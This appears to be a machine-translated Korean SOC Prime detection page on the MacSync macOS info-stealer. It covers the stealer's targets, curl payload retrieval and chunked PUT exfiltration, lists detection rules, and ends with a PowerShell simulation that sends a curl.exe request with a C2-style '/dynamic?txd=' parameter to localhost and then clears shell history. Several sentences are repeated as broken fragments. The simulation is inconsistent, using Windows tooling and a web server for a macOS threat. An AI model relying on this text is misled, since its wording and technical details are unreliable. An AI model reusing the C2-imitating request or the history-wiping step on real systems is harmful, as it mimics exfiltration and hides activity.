SOC Prime Bias: High

20 Aug 2026 07:15 UTC

행동 분석을 통한 MacSync 스틸러 인프라 추적

Author Photo
SOC Prime Team linkedin icon 팔로우
행동 분석을 통한 MacSync 스틸러 인프라 추적
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

MacSync Stealer는 급속하게 변하는 명령 및 제어 인프라를 이용하는 macOS 집중형 정보 탈취자입니다. 이 악성코드는 macOS 키체인 내용, 브라우저 자격 증명, SSH 키 및 클라우드 자격 증명을 포함한 귀중한 데이터를 대상으로 합니다. 이 스크립트 기반 공격 체인은 사회 공학, curl을 통한 페이로드 검색, HTTP PUT 요청을 사용한 덩어리화된 데이터 탈취를 결합합니다. curl, 및 HTTP PUT 요청을 사용한 덩어리화된 데이터 탈취.

조사

Microsoft Defender 전문가들은 정적인 도메인 지표에 의존하지 않고, 반복적인 엔드포인트 및 네트워크 동작을 상관 조정하여 위협을 식별했습니다. 이 조사는 특별한 URI 경로, macOS User-Agent 문자열, 고유한 업로드 매개변수와 같은 지속적인 행동 축을 중심으로 30개 이상의 도메인을 연결했습니다. 이 접근 방법은 연구자들이 초기 페이로드 검색에서 데이터 준비 및 최종 탈취에 이르기까지의 활동을 추적할 수 있도록 했습니다.

완화

조직들은 보안 인식과 수상한 붙여넣기 및 실행 워크플로우를 제한하는 플랫폼 제어를 통해 사용자 주도 터미널 실행의 위험을 줄여야 합니다. macOS 키체인 및 브라우저 프로필과 같은 자격 증명 저장소를 무단 접근으로부터 보호하는 것이 중요합니다. 맥OS 유틸리티와 비정상적인 HTTP PUT 업로드의 수상한 조합을 모니터링하면 활성 데이터 탈취를 감지하는 데 도움을 줄 수 있습니다.

응답

MacSync Stealer 활동이 감지되면, 대응자는 의심스러운 셸 및 AppleScript 실행을 아웃바운드 네트워크 원격 측정과 연관시켜야 합니다. 조사자는 /tmp/와 같은 임시 위치에서 아카이브 생성 여부를 확인하고 민감한 파일에 대한 무단 접근을 식별해야 합니다. 네트워크 활동도 업로드 식별자를 포함한 요청을 검토해야 합니다. /tmp/ 및 민감한 파일에 대한 무단 접근을 식별해야 합니다. 네트워크 활동도 검토해야 합니다. curl 업로드 식별자와 같은 요청 upload_id, chunk_index, 및 total_chunks.

공격 흐름

저희는 이 부분을 아직 업데이트하고 있습니다.

탐지

수상한 Curl 실행 시도 [MacOS] (cmdline을 통해)

SOC Prime 팀
2026년 8월 19일

MacOS 임시 폴더에 아카이브 생성됨 (file_event을 통해)

SOC Prime 팀
2026년 8월 19일

MacSync Stealer C2 및 데이터 탈취 패턴 탐지 [웹서버]

SOC Prime AI 규칙
2026년 8월 19일

MacSync Stealer 초기 페이로드 검색 및 AppleScript 실행 탐지 [Linux 프로세스 생성]

SOC Prime AI 규칙
2026년 8월 19일

시뮬레이션 실행

전제 조건: 원격 측정 및 기준 프리플라이트 검사가 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 유발하도록 설계된 적군 기술(TTP)의 정확한 실행을 상세히 설명합니다. 명령과 내러티브는 반드시 식별된 TTP를 직접 반영해야 하고 탐지 로직에 의한 정확한 원격 측정을 생성하는 것을 목표로 해야 합니다. 추상적이거나 관련 없는 예시는 오진을 초래합니다.

  • 공격 내러티브 및 명령: 침입자는 MacSync Stealer를 타겟 웹서버에 성공적으로 배치했습니다. 자격 증명과 민감한 시스템 정보를 수집한 후, 공격자는 이제 이 데이터를 그들의 명령 및 제어 (C2) 서버로 탈취하고자 합니다. 일반적인 관리 트래픽과 어우러져 간단한 서명 기반 도구로부터 탐지를 피하기 위해, 공격자는 curl.exe를 활용하여 도난당한 데이터를 전송합니다. 그들은 요청에 MacSync C2 인프라의 알려진 서명을 나타내는 특정 악성 URI 매개변수를 덧붙입니다. curl.exe 도난당한 데이터를 보낼 때 사용됩니다. 그들은 요청에 MacSync C2 인프라의 알려진 서명을 나타내는 특정 악성 URI 매개변수 /dynamic?txd= 를 덧붙입니다.

  • 회귀 테스트 스크립트:

    # MacSync Stealer C2 탐지 규칙을 유발하는 시뮬레이션 스크립트
    # 이 명령은 curl을 사용하여 악성 URI 패턴으로 시뮬레이션 된 C2 엔드포인트를 타격합니다.
    
    $target_url = "http://127.0.0.1/dynamic?txd=malicious_payload_data"
    Write-Host "MacSync Stealer C2 통신을 시뮬레이션 중..."
    curl.exe $target_url
  • 정리 명령:

    # 이 시뮬레이션에서는 지속적인 파일이 생성되지 않음;
    # 그러나 필요시 로컬 히스토리를 삭제하십시오.
    Clear-History